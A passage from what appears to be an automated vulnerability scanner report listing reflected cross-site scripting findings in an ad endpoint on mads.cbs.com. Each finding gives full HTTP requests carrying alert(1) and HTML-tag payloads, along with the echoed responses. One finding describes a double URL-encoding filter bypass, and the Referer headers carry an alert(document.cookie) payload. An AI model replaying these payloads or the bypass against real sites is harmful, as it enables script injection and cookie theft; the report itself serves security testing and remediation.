User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:37:23 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:37:23 GMT
Content-Length: 602

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806e0b42<a>621aa8019b1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='6711' POS='
...[SNIP]...

1.142. http://mads.cbs.com/mac-ad [PAGESTATE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript inline comment. The payload b9251*/alert(1)//b4f70b6b83f was submitted in the PAGESTATE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=b9251*/alert(1)//b4f70b6b83f&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:34:05 GMT
Server: Apache/2.2
Content-Length: 1179
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:34:05 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=b9251*/alert(1)//b4f70b6b83f&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.w
...[SNIP]...

1.143. http://mads.cbs.com/mac-ad [PAGESTATE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92086%2527%253balert%25281%2529%252f%252f2cd17c06c35 was submitted in the PAGESTATE parameter. This input was echoed as 92086';alert(1)//2cd17c06c35 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the PAGESTATE request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=92086%2527%253balert%25281%2529%252f%252f2cd17c06c35&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:34:03 GMT
Server: Apache/2.2
Content-Length: 1225
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:34:03 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=92086%2527%253balert%25281%2529%252f%252f2cd17c06c35&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT
...[SNIP]...
sion%253db&amp;ucat_rsi=%2526&amp;pg=&amp;t=2011.02.06.20.34.03/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" style="position:absolute; top:0px; left:0px" width="0" />');
;window.CBSI_PAGESTATE='92086';alert(1)//2cd17c06c35';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] c17-ad-xw1.cnet.com::2603727760 2011.02.06.20.34.03 *//* MAC T 0.0.3.3 */

1.144. http://mads.cbs.com/mac-ad [POS parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the POS request parameter is copied into the HTML document as plain text between tags. The payload da453<a>3c66de957c3 was submitted in the POS parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100da453<a>3c66de957c3&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:36:42 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:36:42 GMT
Content-Length: 616

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100da453<a>3c66de957c3&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='80' CNET-PTYPE='6711' POS='100da453a3c66de957c3' NCAT='19650:19806:' CNET-PARTNER-ID='1' DVAR_P
...[SNIP]...

1.145. http://mads.cbs.com/mac-ad [PTYPE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the PTYPE request parameter is copied into a JavaScript inline comment. The payload dba23*/alert(1)//ccaf888c20c was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711dba23*/alert(1)//ccaf888c20c&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:34:47 GMT
Server: Apache/2.2
Content-Length: 1173
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:34:47 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711dba23*/alert(1)//ccaf888c20c&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default a
...[SNIP]...

1.146. http://mads.cbs.com/mac-ad [PTYPE parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the PTYPE request parameter is copied into the HTML document as plain text between tags. The payload 1857c<a>4edf02830e0 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=67111857c<a>4edf02830e0&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:35:08 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:35:08 GMT
Content-Length: 599

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=67111857c<a>4edf02830e0&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT M
...[SNIP]...

1.147. http://mads.cbs.com/mac-ad [SITE parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload 37931<a>6c42c321af7 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=16437931<a>6c42c321af7&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:34:07 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:34:07 GMT
Content-Length: 576

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=16437931<a>6c42c321af7&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: C
...[SNIP]...

1.148. http://mads.cbs.com/mac-ad [cookiesOn parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the cookiesOn request parameter is copied into the HTML document as plain text between tags. The payload 177ed<a>5d4faf2f940 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1177ed<a>5d4faf2f940&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:37:46 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:37:46 GMT
Content-Length: 602

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1177ed<a>5d4faf2f940&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='6711' POS='100' NCAT='1
...[SNIP]...

1.149. http://mads.cbs.com/mac-ad [cookiesOn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the cookiesOn request parameter is copied into a JavaScript inline comment. The payload 89391*/alert(1)//284c42343f2 was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=189391*/alert(1)//284c42343f2&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:35:48 GMT
Server: Apache/2.2
Content-Length: 1146
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:35:48 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=189391*/alert(1)//284c42343f2&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.150. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6ebb1<a>851735ff48a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1&6ebb1<a>851735ff48a=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1; __utmz=235293011.1297024404.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/34; __utma=235293011.256726451.1297024404.1297024404.1297024404.1; __utmc=235293011; __utmb=235293011.1.10.1297024404

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:40:04 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Sun, 06 Feb 2011 20:40:04 GMT
Content-Length: 606

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704&ADREQ&SP=119&POS=100&cookiesOn=1&6ebb1<a>851735ff48a=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='119' CNET-PTYPE='6711' POS='100' NCAT='19650:19806:' CNET-PARTNER-ID='1' DVAR_PSID='' ) TO _RGROUP *//* M
...[SNIP]...

1.151. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload 8e53e*/alert(1)//a041a4ab76d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1&8e53e*/alert(1)//a041a4ab76d=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:37:33 GMT
Server: Apache/2.2
Content-Length: 1156
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:37:33 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=80&POS=100&cookiesOn=1&8e53e*/alert(1)//a041a4ab76d=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.152. http://mads.cbs.com/mac-ad [x-cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the x-cb request parameter is copied into a JavaScript inline comment. The payload e876d*/alert(1)//2d9085e2f91 was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859e876d*/alert(1)//2d9085e2f91&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:36:08 GMT
Server: Apache/2.2
Content-Length: 1147
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Sun, 06 Feb 2011 20:36:08 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859e876d*/alert(1)//2d9085e2f91&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- default ad -->
...[SNIP]...

1.153. http://mads.cbs.com/mac-ad [x-cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cbs.com
Path:   /mac-ad

Issue detail

The value of the x-cb request parameter is copied into the HTML document as plain text between tags. The payload bca9a<a>70ad7b6acbd was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=11797704bca9a<a>70ad7b6acbd&ADREQ&SP=119&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
